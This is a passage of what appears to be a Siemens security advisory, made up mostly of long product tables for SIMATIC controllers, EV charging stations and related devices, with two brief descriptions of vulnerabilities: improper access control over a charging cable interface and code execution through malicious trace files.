Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Affected devices exhibit improper access control, enabling attackers to potentially access unauthorized services via the charging cable interface.
CWE-923 - Improper Restriction of Communication Channel to Intended Endpoints| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Certain devices contain a vulnerability where trace files are insufficiently sanitized, enabling attackers to execute code by deceiving users into importing malicious trace files.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
